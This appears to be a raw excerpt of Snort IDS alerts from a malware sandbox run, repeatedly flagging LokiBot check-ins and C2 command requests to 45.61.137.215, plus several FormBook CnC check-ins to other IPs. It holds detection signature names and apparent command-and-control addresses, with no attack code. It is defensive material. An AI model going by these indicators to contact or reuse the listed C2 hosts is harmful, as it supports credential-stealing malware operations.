            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49736 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49736 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49736 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49736 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49737 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49737 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49737 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49737 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49738 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49738 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49738 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49738 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49739 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49739 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49739 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49739 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49740 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49740 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49740 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49740 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49741 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49741 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49741 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49741 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49742 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49742 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49742 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49742 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49743 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49743 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49743 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49743 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49744 -> 103.224.212.213:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49745 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49745 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49745 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49745 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49746 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49746 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49746 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49746 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49747 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49747 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49747 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49747 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49748 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49748 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49748 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49748 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49749 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49749 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49749 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49749 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49750 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49750 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49750 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49750 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49751 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49751 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49751 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49751 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49752 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49752 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49752 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49752 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49753 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49753 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49753 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49753 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49754 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49754 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49754 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49754 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49755 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49755 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49755 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49755 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49756 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49756 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49756 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49756 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49757 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49757 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49757 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49757 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49758 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49758 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49758 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49758 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49759 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49759 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49759 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49759 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49760 -> 104.21.10.127:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49761 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49761 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49761 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49761 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49762 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49762 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49762 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49762 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49763 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49763 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49763 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49763 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49764 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49764 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49764 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49764 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49765 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49765 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49765 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49765 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49766 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49766 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49766 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49766 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49767 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49767 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49767 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49767 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49768 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49769 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49769 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49769 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49769 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49770 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49770 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49770 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49770 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49771 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49771 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49771 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49771 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49772 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49772 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49772 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49772 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49773 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49773 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49773 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49773 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49774 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49774 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49774 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49774 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49775 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49775 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49775 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49775 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49776 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49776 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49776 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49776 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49777 -> 34.132.146.171:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49778 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49778 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49778 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49778 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49779 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49779 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49779 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49779 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49780 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49780 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49780 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49780 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49781 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49781 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49781 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49781 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49782 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49782 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49782 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49782 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49783 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49783 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49783 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49783 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49784 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49784 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49784 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49784 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49785 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49785 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49785 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49785 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49786 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49786 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49786 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49786 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49787 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49787 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49787 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49787 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49788 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49788 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49788 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49788 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49789 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49789 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49789 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49789 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49790 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49790 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49790 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49790 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49791 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49791 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49791 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49791 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49792 -> 101.36.116.238:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49793 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49793 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49793 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49793 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49794 -> 45.61.137.215:80
